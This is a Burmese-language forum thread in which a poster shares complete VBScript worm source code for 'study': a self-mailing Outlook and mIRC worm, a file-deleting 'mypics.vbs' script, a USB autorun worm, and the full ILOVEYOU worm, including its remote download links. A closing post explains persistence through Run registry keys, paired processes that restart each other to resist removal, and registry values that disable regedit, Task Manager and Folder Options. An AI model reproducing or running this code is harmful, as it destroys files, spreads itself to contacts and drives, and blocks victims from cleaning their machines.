MYSTERY ZILLION တွင် English သို့မဟုတ် Unicode ဖြင့်သာ အသုံးပြုခွင့်ရှိသည်။ ဇော်ဂျီ ၊ ဧရာ စသည်တို့ကို အသုံးပြုခွင့် မရှိ။ Unicode fonts များမှာ Mon3,Yunghkio, Myanamr3 စသည်များ အသုံးပြုနိုင်သည်။ Unicode Guide ကို ဒီမှာ Download ချပါ။ Zawgyi to Unicode Converter
Don't share ebook or software if nobody request. You can find free book websites on here. We are welcome for discussion or asking question instead.

Virus ရေးမယ်

edited September 2008 in Antivirus & Virus
ကျွန်တော့်မှာ ရှိတဲ့ Virus code တွေ ဝေမျှလိုက်ပါတယ်.. နောက်ပြီး ကျွန်တော် သိထားတဲ့ virus နဲ့ ဆိုင်တာလေးတွေကိုလည်း ဒီမှာ ဝေမျှပါ့မယ်.. အခြားသူတွေလည်း ဝေမျှပေးပါ.. ဆွေးနွေးပေးပါ

မှတ်ချက်များ

  • edited November 2007 Administrators
    Outlook ကနေ address book ကိုဖတ်နည်း..
    နောက်ပြီး virus ကို attach file အနေနဲ့ ပို့နည်း..
    MIRC ကနေ virus ပို့နည်း...
    စတာတွေ လေ့လာနိုင်ပါတယ်.
    'Vbs.Vbswg.Vbswg Worm Created By [Ipnuker]. 5/19/2003
    Set K1IPCRVC = createobject("scripting.filesystemobject")
    L3ROP693 = K1IPCRVC.getspecialfolder(0)
    T225DMBE = L3ROP693 & "\Vbswg_Worm.jpg.vbs"
    Set A46IV9KC = createobject("wscript.shell")
    A46IV9KC.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & T225DMBE & " %"
    K1IPCRVC.copyfile wscript.scriptfullname, T225DMBE
    If A46IV9KC.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Vbswg Worm\Q8056VMR") <> 1 then
    QSQKI029
    End if
    If A46IV9KC.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Vbswg Worm\GV3B1H75") <> 1 then
    V8TS7H71 ""
    End if
    Function QSQKI029()
    Set DIRK5BAE = CreateObject("Outlook.Application")
    If DIRK5BAE = "Outlook" Then
    Set L57M21VG = DIRK5BAE.GetNameSpace("MAPI")
    Set IB3EDRE4 = L57M21VG.AddressLists
    For Each H9IG8I51 In IB3EDRE4
    If H9IG8I51.AddressEntries.Count <> 0 Then
    TCS3742M = H9IG8I51.AddressEntries.Count
    For FI632788 = 1 To TCS3742M
    Set JDBN18FV = DIRK5BAE.CreateItem(0)
    Set K1C7B571 = H9IG8I51.AddressEntries(FI632788)
    JDBN18FV.To = K1C7B571.Address
    JDBN18FV.Subject = "Very Important!"
    JDBN18FV.Body = "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & ""
    execute "set G61G645V =JDBN18FV." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
    GK5B6D1R = T225DMBE
    JDBN18FV.DeleteAfterSubmit = True
    G61G645V.Add GK5B6D1R
    If JDBN18FV.To <> "" Then
    JDBN18FV.Send
    End If
    Next
    End If
    Next
    End If
    End function
    Function V8TS7H71(LM61VGHH)
    If LM61VGHH <> "" Then
    DKDRE5H5 = A46IV9KC.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
    If K1IPCRVC.fileexists("c:\mirc\mirc.ini") Then
    LM61VGHH = "c:\mirc"
    ElseIf K1IPCRVC.fileexists("c:\mirc32\mirc.ini") Then
    LM61VGHH = "c:\mirc32"
    ElseIf K1IPCRVC.fileexists(DKDRE5H5 & "\mirc\mirc.ini") Then
    LM61VGHH = DKDRE5H5 & "\mirc"
    ElseIf K1IPCRVC.fileexists(DKDRE5H5 & "\mirc32\mirc.ini") Then
    LM61VGHH = DKDRE5H5 & "\mirc"
    Else
    LM61VGHH = ""
    End If
    End If
    If LM61VGHH <> "" Then
    Set A08I54T9 = K1IPCRVC.CreateTextFile(LM61VGHH & "\script.ini", True)
    A08I54T9 = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
    A08I54T9 = A08I54T9 & vbCrLf & "n0=on 1:JOIN:#:{"
    A08I54T9 = A08I54T9 & vbCrLf & "n1= /if ( $nick == $me ) { halt }"
    A08I54T9 = A08I54T9 & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "
    A08I54T9 = A08I54T9 & T225DMBE
    A08I54T9 = A08I54T9 & vbCrLf & "n3=}"
    script.Close
    End If
    End Function
  • edited November 2007 Administrators
    ဒါကတော့ နောက်တစ်မျိုးပါ..
    mypics.VBS ဆိုတာနဲ့ သိမ်းလိုက်တာနဲ့ အလုပ်လုပ်ပါမယ်..
    Antivirus တော်တော်များများက သိပါတယ်..
    လေ့လာဖို့အတွက်ပါ..
    သူ့လုပ်ဆောင်ချက်တွေကတော့

    1.add the file to the regisrty
    2.virus copys itself to autoexec.exe
    3.virus copys itself to winpgup.exe
    4.dislpays 10 msgbox's
    5.opens mspaint.exe 100 times-mspaint is paint
    6.opens calc.exe 100 times-calc is calculater
    7.virus copys itself to the victoms desktop
    8.virus delete's all text documents on the "desktop" not system
    9.file delete's all text files from "C:\Documents and Settings\All Users\"
    10.virus copys itself to windows folder
    11.virus spreads by "mirc"-or (internet relay chat",irc)
    12.virus deletes 10 random files in "C:\" if allowed

    [PHP]on error resume next
    'created by [nightmare-je]
    dim mypic
    set mypics = createobject("scripting.filesystemobject")
    mypics101 = mypics.getspecialfolder(0)
    mypics102 = mypics101 & "\mypics.vbs"
    dim mypics103
    set mypics103 = createobject("wscript.shell")
    mypics103.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & mypics102 & " %"
    mypics.copyfile wscript.scriptfullname, mypics102
    dim autoex
    set autoex = createobject ("scripting.filesystemobject")
    autoex.copyfile "mypics.vbs", "C:\autoexec.exe"
    set autoex = nothing
    dim winpg
    set winpg = createobject ("scripting.filesystemobject")
    winpg.copyfile "mypics.vbs", "C:\windows\system\winpgup.exe"
    set winpg = nothing
    set win32 = nothing
    set win32pg = nothing
    set prog1 = nothing
    for i = 1 to 10
    msgbox "ECHO 0%"
    next
    for i = 1 to 100
    dim paint, calc
    set paint = createobject ("wscript.shell")
    paint.run "mspaint.exe"
    set paint = nothing
    set calc =createobject ("wscript.shell")
    calc.run "calc.exe"
    set calc = nothing
    next
    for i = 1 to 10
    dim delrn
    set delrn = createobject ("scripting.filesystemobject")
    delrn.deletefile "C:\*.*"
    set delrn = nothing
    next
    dim desk
    set desk = createobject ("scripting.filesystemobject")
    desk.copyfile "mypics.vbs","C:\Documents and Settings\All Users\Desktop\mypics.vbs"
    set desk = nothing
    dim deltxt
    set deltxt = createobject ("scripting.filesystemobject")
    deltxt.deletefile "C:\Documents and Settings\all users\Desktop\*.txt"
    dim delwintxt
    set delwintxt = createobject ("scripting.filesystemobject")
    delwintxt. "C:\Documents and Settings\All Users\*.txt"
    dim i
    set i = createobject ("scripting.filesystemobject")
    i.copyfile "mypics.vbs","C:\windows\mypics.vbs"
    set i = nothing
    dim mirc, R
    set mirc = createobject ("scripting.filesystemobject")
    if mirc.fileexists ("C:\mirc\script.ini") then
    R=mirc.run ("C:\mirc\script.ini", 0)
    mirc.writeline ""
    mirc.writeline "[script]"
    mirc.writeline "n0=on1:join:#:/.dcc send -c $nick C:\windows\mypics.vbs"
    mirc.close
    set mirc = nothing
    SET R = NOTHING
    end if[/PHP]
  • edited November 2007 Administrators
    ဒါကိုတော့ လူတွေ သိပြီးသားပါ...
    တော်တော်လေးလည်း ရန်ကုန်မှာ ဒုက္ခပေးသွားပါတယ်..
    သူနဲ့အတူ Flashy ကလည်း နာမည်ကြီးခဲ့ပါတယ်..
    အခုတော့ Antivirus တွေက သူ့ကို သိသွားပါပြီ..
    ဒါပေမယ့် လေ့လာလိုသူတွေ အတွက်ပါ..

    [PHP]‘My name is Slow but sure V0.04
    ‘This is a virus
    ‘Don’t Save this file name as MS32DLL.dll.vbs and then don’t run
    on error resume next
    dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
    atr = “[autorun]”&vbcrlf&”shellexecute=wscript.exe MS32DLL.dll.vbs”
    set fs = createobject(”Scripting.FileSystemObject”)
    set mf = fs.getfile(Wscript.ScriptFullname)
    dim text,size
    size = mf.size
    check = mf.drive.drivetype
    set text=mf.openastextstream(1,-2)
    do while not text.atendofstream
    mysource=mysource&text.readline
    mysource=mysource & vbcrlf
    loop
    do
    Set winpath = fs.getspecialfolder(0)
    set tf = fs.getfile(winpath & “\MS32DLL.dll.vbs”)
    tf.attributes = 32
    set tf=fs.createtextfile(winpath & “\MS32DLL.dll.vbs”,2,true)
    tf.write mysource
    tf.close
    set tf = fs.getfile(winpath & “\MS32DLL.dll.vbs”)
    tf.attributes = 39
    for each flashdrive in fs.drives
    If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
    set tf=fs.getfile(flashdrive.path &”\MS32DLL.dll.vbs”)
    tf.attributes =32
    set tf=fs.createtextfile(flashdrive.path &”\MS32DLL.dll.vbs”,2,true)
    tf.write mysource
    tf.close
    set tf=fs.getfile(flashdrive.path &”\MS32DLL.dll.vbs”)
    tf.attributes =39
    set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
    tf.attributes = 32
    set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
    tf.write atr
    tf.close
    set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
    tf.attributes=39
    end if
    next
    set rg = createobject(”WScript.Shell”)
    rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,winpath&”\MS32DLL.dll.vbs”
    rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”Hacked by Godzilla”
    if check <> 1 then
    Wscript.sleep 200000
    end if
    loop while check<>0
    set sd = createobject(”Wscript.shell”)
    sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname[/PHP]
  • edited November 2007 Administrators
    တချိန်က နာမည်ကြီးပြီး လူတွေကို ဒုက္ခပေးဘူးတဲ့
    ILOVEYOU Virus source code ပါ…

    [php]
    rem barok -loveletter(vbe)
    rem by: spyder / [email protected]
    On Error Resume Next
    dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
    eq=""
    ctr=0
    Set fso = CreateObject("Scripting.FileSystemObject")
    set file = fso.OpenTextFile(WScript.ScriptFullname,1)
    vbscopy=file.ReadAll
    main()
    sub main()
    On Error Resume Next
    dim wscr,rr
    set wscr=CreateObject("WScript.Shell")
    rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
    if (rr>=1) then
    wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
    end if
    Set dirwin = fso.GetSpecialFolder(0)
    Set dirsystem = fso.GetSpecialFolder(1)
    Set dirtemp = fso.GetSpecialFolder(2)
    Set c = fso.GetFile(WScript.ScriptFullName)
    c.Copy(dirsystem&"\MSKernel32.vbs")
    c.Copy(dirwin&"\Win32DLL.vbs")
    c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
    regruns()
    html()
    spreadtoemail()
    listadriv()
    end sub
    sub regruns()
    On Error Resume Next
    Dim num,downread
    regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
    regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
    downread=""
    downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
    if (downread="") then
    downread="c:\"
    end if
    if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
    Randomize
    num = Int((4 * Rnd) + 1)
    if num = 1 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe";
    elseif num = 2 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe";
    elseif num = 3 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe";
    elseif num = 4 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe";
    end if
    end if
    if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
    regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
    regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
    end if
    end sub
    sub listadriv
    On Error Resume Next
    Dim d,dc,s
    Set dc = fso.Drives
    For Each d in dc
    If d.DriveType = 2 or d.DriveType=3 Then
    folderlist(d.path&"\")
    end if
    Next
    listadriv = s
    end sub
    sub infectfiles(folderspec)
    On Error Resume Next
    dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
    set f = fso.GetFolder(folderspec)
    set fc = f.Files
    for each f1 in fc
    ext=fso.GetExtensionName(f1.path)
    ext=lcase(ext)
    s=lcase(f1.name)
    if (ext="vbs") or (ext="vbe") then
    set ap=fso.OpenTextFile(f1.path,2,true)
    ap.write vbscopy
    ap.close
    elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
    set ap=fso.OpenTextFile(f1.path,2,true)
    ap.write vbscopy
    ap.close
    bname=fso.GetBaseName(f1.path)
    set cop=fso.GetFile(f1.path)
    cop.copy(folderspec&"\"&bname&".vbs")
    fso.DeleteFile(f1.path)
    elseif(ext="jpg") or (ext="jpeg") then
    set ap=fso.OpenTextFile(f1.path,2,true)
    ap.write vbscopy
    ap.close
    set cop=fso.GetFile(f1.path)
    cop.copy(f1.path&".vbs")
    fso.DeleteFile(f1.path)
    elseif(ext="mp3") or (ext="mp2") then
    set mp3=fso.CreateTextFile(f1.path&".vbs")
    mp3.write vbscopy
    mp3.close
    set att=fso.GetFile(f1.path)
    att.attributes=att.attributes+2
    end if
    if (eq<>folderspec) then
    if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
    set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
    scriptini.WriteLine "[script]"
    scriptini.WriteLine ";mIRC Script"
    scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
    scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
    scriptini.WriteLine ";"
    scriptini.WriteLine ";Khaled Mardam-Bey"
    scriptini.WriteLine ";http://www.mirc.com";
    scriptini.WriteLine ";"
    scriptini.WriteLine "n0=on 1:JOIN:#:{"
    scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
    scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
    scriptini.WriteLine "n3=}"
    scriptini.close
    eq=folderspec
    end if
    end if
    next
    end sub
    sub folderlist(folderspec)
    On Error Resume Next
    dim f,f1,sf
    set f = fso.GetFolder(folderspec)
    set sf = f.SubFolders
    for each f1 in sf
    infectfiles(f1.path)
    folderlist(f1.path)
    next
    end sub
    sub regcreate(regkey,regvalue)
    Set regedit = CreateObject("WScript.Shell")
    regedit.RegWrite regkey,regvalue
    end sub
    function regget(value)
    Set regedit = CreateObject("WScript.Shell")
    regget=regedit.RegRead(value)
    end function
    function fileexist(filespec)
    On Error Resume Next
    dim msg
    if (fso.FileExists(filespec)) Then
    msg = 0
    else
    msg = 1
    end if
    fileexist = msg
    end function
    function folderexist(folderspec)
    On Error Resume Next
    dim msg
    if (fso.GetFolderExists(folderspec)) then
    msg = 0
    else
    msg = 1
    end if
    fileexist = msg
    end function
    sub spreadtoemail()
    On Error Resume Next
    dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
    set regedit=CreateObject("WScript.Shell")
    set out=WScript.CreateObject("Outlook.Application")
    set mapi=out.GetNameSpace("MAPI")
    for ctrlists=1 to mapi.AddressLists.Count
    set a=mapi.AddressLists(ctrlists)
    x=1
    regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
    if (regv="") then
    regv=1
    end if
    if (int(a.AddressEntries.Count)>int(regv)) then
    for ctrentries=1 to a.AddressEntries.Count
    malead=a.AddressEntries(x)
    regad=""
    regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
    if (regad="") then
    set male=out.CreateItem(0)
    male.Recipients.Add(malead)
    male.Subject = "ILOVEYOU"
    male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
    male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
    male.Send
    regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
    end if
    x=x+1
    next
    regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
    else
    regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
    end if
    next
    Set out=Nothing
    Set mapi=Nothing
    end sub
    sub html
    On Error Resume Next
    dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
    dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@[email protected]@ CONTENT=@-@BAROK VBS - [email protected]@>;"&vbcrlf& _
    "<META NAME=@-@[email protected]@ CONTENT=@-@spyder ?-? [email protected] ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March [email protected]@>;"&vbcrlf& _
    "<META NAME=@-@[email protected]@ CONTENT=@-@simple but i think this is good...@-@>;"&vbcrlf& _
    "<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
    "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@[email protected]@ BGCOLOR=@-@#[email protected]@>;"&vbcrlf& _
    "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
    "<?-?CENTER><MARQUEE LOOP=@-@[email protected]@ BGCOLOR=@-@[email protected]@>;
    z
    z
    <?-?MARQUEE> "&vbcrlf& _
    "<?-?BODY><?-?HTML>"&vbcrlf& _
    "<SCRIPT language=@-@[email protected]@>;"&vbcrlf& _
    "<!--?-??-?"&vbcrlf& _
    "if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
    "?-??-?-->"&vbcrlf& _
    "<?-?SCRIPT>"&vbcrlf& _
    "<SCRIPT LANGUAGE=@-@[email protected]@>;"&vbcrlf& _
    "<!--"&vbcrlf& _
    "on error resume next"&vbcrlf& _
    "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
    "aw=1"&vbcrlf& _
    "code="
    dta2="set fso=CreateObject(@-@Scripting[email protected]@)";&vbcrlf& _
    "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
    "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
    "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
    "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
    "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32[email protected]@)";&vbcrlf& _
    "wri.write code4"&vbcrlf& _
    "wri.close"&vbcrlf& _
    "if (fso.FileExists(dirsystem&@-@^-^MSKernel32[email protected]@)) then"&vbcrlf& _
    "if (err.number=424) then"&vbcrlf& _
    "aw=0"&vbcrlf& _
    "end if"&vbcrlf& _
    "if (aw=1) then"&vbcrlf& _
    "document.write @-@ERROR: can#-#t initialize [email protected]@&;vbcrlf& _
    "window.close"&vbcrlf& _
    "end if"&vbcrlf& _
    "end if"&vbcrlf& _
    "Set regedit = CreateObject(@-@WScript[email protected]@)";&vbcrlf& _
    "regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^[email protected]@,dirsystem&@-@^-^MSKernel32[email protected]@&;vbcrlf& _
    "?-??-?-->"&vbcrlf& _
    "<?-?SCRIPT>"
    dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
    dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
    dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
    dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
    dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
    dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
    dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
    dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
    set fso=CreateObject("Scripting.FileSystemObject")
    set c=fso.OpenTextFile(WScript.ScriptFullName,1)
    lines=Split(c.ReadAll,vbcrlf)
    l1=ubound(lines)
    for n=0 to ubound(lines)
    lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
    lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
    lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
    if (l1=n) then
    lines(n)=chr(34)+lines(n)+chr(34)
    else
    lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
    end if
    next
    set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
    b.close
    set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
    d.write dt5
    d.write join(lines,vbcrlf)
    d.write vbcrlf
    d.write dt6
    d.close
    end sub
    [/php]
  • edited November 2007 Administrators
    အများအားဖြင့်တော့….
    Virus က တကယ်တန်းကြတော့ Computer ကို ဖျက်ဖို့….
    ဒါပေမယ့် Antivirus တွေက သိကြတယ်…
    Virus တွေကိုဘယ်လို သိကြတာလဲဆို…
    သူတို့က Virus Sample File တွေကနေသိကြတယ်…
    သူတို့ Antivirus ထဲမှာရှိတဲ့ Sample File တွေထဲက မရှိရင်….
    အဲဒီ Virus ကိုမသိတော့ဘူး….

    နောက်တစ်ချက်ကျတော့ Antivirus တွေက စစ်ရင် File တစ်ခု ထုတ်လိုက်တယ်…
    အဲဒီ File မှာ virus ကူးမကူးကနေ သိကြပါတယ်…

    အဲဒါကတော့ antivirus တော်တော်များများ အလုပ်လုပ်ပုံပါ….

    Virus က စမယ်ဆိုကတည်းက 1 file ထဲနဲ့ လုပ်လို့မဖြစ်ပါဘူး…
    အနည်းဆုံး file 2 file မှ ဖြစ်မှာပါ…
    ဘာဖြစ်လို့လည်းဆို…
    file 1 file ကို ပိတ်လိုက်ရင် နောက် file တစ် file က အဲဒါက ပြန်ဖွင့်ပေးမလို့ပါ…

    ကဲ…
    A က တကယ့် virus
    B ကတော့ A ကို အကူအညီပေးဖို့ပေါ့…

    A ကို run တာနဲ့….
    B လည်း run မယ်…

    ဒါမှ မဟုတ် B ကို run တာနဲ့
    A လည်း run မယ်..

    အဲဒီပုံစံပေါ့…
    A ကတော့ virus အလုပ်တွေလုပ်မယ်…
    B ကတော့ A ရှိမရှိစစ်နေမယ်…
    A ကလည်း B ရှိမရှိစစ်မှာပဲ…

    user က virus ကိုတွေ့ပြီ Process တွေ ထဲမှာ…
    A ကိုအရင် ပိတ်လိုက်မယ်…
    ပြီးမှ B ကိုပိတ်မယ်…
    အဲလို စဉ်းစားပြီး A ကို ပိတ်လိုက်တာပေါ့…

    ဒါပေမယ့် A ကိုပိတ်လိုက်တာနဲ့ B က ချက်ချင်း A ကိုပြန်ခေါ်ဖွင့်တယ်….
    အဲမှာ virus သတ်တဲ့ကောင်တွေ စားကုန်ကြရော…
    B ကို ပိတ်တော့လည်း A က ပြန်ဖွင့်ပေး…
    နှစ်ခုလည်း တပြိုင်တည်း ပိတ်ဖို့ကလည်း မဖြစ်နိုင်ဘူး..
    ကဲဒါဆို ဘယ်လိုလုပ်မလဲ….
    အခုတလော အဲလို virus တွေ တော်တော်များများ အရေးများလာပါတယ်…

    အဲလို virus တွေကို ဖျက်ဖို့ဆိုရင်တော့ ကိုယ့်စက်က hard disk နဲ့မတက်နဲ့…
    ဖြုတ်သွားလိုက်.. တခြားစက်မှာ secondary နဲ့ တက်…
    A ကော B ပါရှာဖျက်လိုက်… ပြီးပြီ…

    virus တွေ windows စစချင်းအလုပ်လုပ်အောင်…
    Registery ထဲမှာ
    “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”
    အဲဒီအောက်မှာ File ပတ်လမ်းကြောင်းရေးထားခဲ့မယ်ဆိုရင်တော့
    ရေးထားတဲ့ program ကို windows စစတက်ပြီးတာနဲ့ run ပေးမှာပါ…

    A ဆိုတဲ့ virus က အဲဒီ registery ဆိုတဲ့နေရာမှာ အချိန်တိုင်း သွားသွားရေးခိုင်းထားပါမယ်…
    ဒါဆိုရင် user က msconfig နဲ့၀င် သွားပြီး windows တက်တက်ခြင်းမှာ မတက်အောင် လုပ်လည်း မထူးတော့ဘူးပေါ့….

    နောက်ထပ်နည်းကတော့ registery ကို ပိတ်တဲ့နည်း

    User Key: [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
    Value Name: DisableRegistryTools
    Data Type: REG_DWORD (DWORD Value)
    Value Data: (0 = allow regedit, 1 = disable regedit)

    အဲမှာ REG_DWORD ကို create လုပ်ပြီးတော့ value မှာ 1 ထည့်လိုက်ရင်တော့ user က registery သုံးလို့မရတော့ပါဘူး…

    နောက်ပြီးတော့ Task Manager ( Ctrl+Alt+Del ) ကိုဖျောက်လိုက်ချင်ရင်တော့

    User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
    System]
    System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
    System]
    Value Name: DisableTaskMgr
    Data Type: REG_DWORD (DWORD Value)
    Value Data: (0 = default, 1 = disable Task Manager)

    အဲမှာ REG_DWORD ကို create လုပ်ပြီးတော့ value မှာ 1 ထည့်လိုက်ရင်တော့ user က registery သုံးလို့မရတော့ပါဘူး…

    Folder Option ကို ထပ်ပြီးဖျောက်လိုက်ချင်ရင်တော့

    User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
    Explorer]
    System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
    Explorer]
    Value Name: NoFolderOptions
    Data Type: REG_DWORD (DWORD Value)
    Value Data: (0 = show options, 1 = hide options)

    အဲမှာ REG_DWORD ကို create လုပ်ပြီးတော့ value မှာ 1 ထည့်လိုက်ရင်တော့ user က Folder Option ကို Tool -> Option

    မှာမမြင်ရတော့ပါဘူး…

    တနည်းပြောရရင် ကျွန်တော်တို့ registery ကို ကောင်းကောင်းလေး ကလိလို့ရတာနဲ့ Computer ကြီးကို လိုသိလို ထိန်းလို့ရပါတယ်… AVG ကတော့ Registery ကို မစစ်ဆေးပါဘူး… ဒါပေမယ့် BitDefender ကတော့ စစ်တယ်ဗျ… ပြောင်းတာနဲ့ ပြောင်းမပြောင်းမေးတယ်… အဲလိုမျိုး Antivirus တွေအတွက်တော့ မလွယ်ဘူးပေါ့….

    Registry ပိုင်းကို http://www.pctools.com/guides/registry မှာလေ့လာလို့ရပါတယ်..

    ဘာနဲ့ ရေးသင့်လဲလို့ ပြောရင် ကိုယ်သန်ရာနဲ့တော့ရေးလို့ရပေမယ့်…
    ဘယ် OS ကို တိုက်ခိုက်မှာလဲ ဆိုတာ စဉ်းစားရမယ်…
    Vbscript(.vbs) ကို linux မှာ သုံးလို့မရဘူး…
    ဒါပေမယ့် Javascript(.js) နဲ့တော့ linux မှာ၇တယ်…
    Windows မှာလည်းရတယ်…
    Javascript(.js) ကတော့ ဘယ်လိုထိ လုပ်ပိုင်ခွင့်ပေးလဲဆိုတာ ကျွန်တော်သေသေချာချာမသိဘူး…
    windows အတွက်ကတော့ .vbs ကတော်တော်လေး ထိရောက်တယ်…
    ကစ်လို့ကောင်းတယ်…

    .exe တွေနဲ့လည်း တိုက်ခိုက်လို့ရတယ်…
    ဒါပေမယ့်…
    ကိုယ်ထုတ်လိုက်တဲ့ .exe ဟာ runtime file မပါပဲနဲ့ run လို့ရရမယ်…
    Windows နဲ့ Linux က file တည်ဆောက်ပုံတွေ မတူညီကြဘူး…
    ဒါကြောင့် Linux အတွက် virus က Linux မှာပဲ ရမယ်…
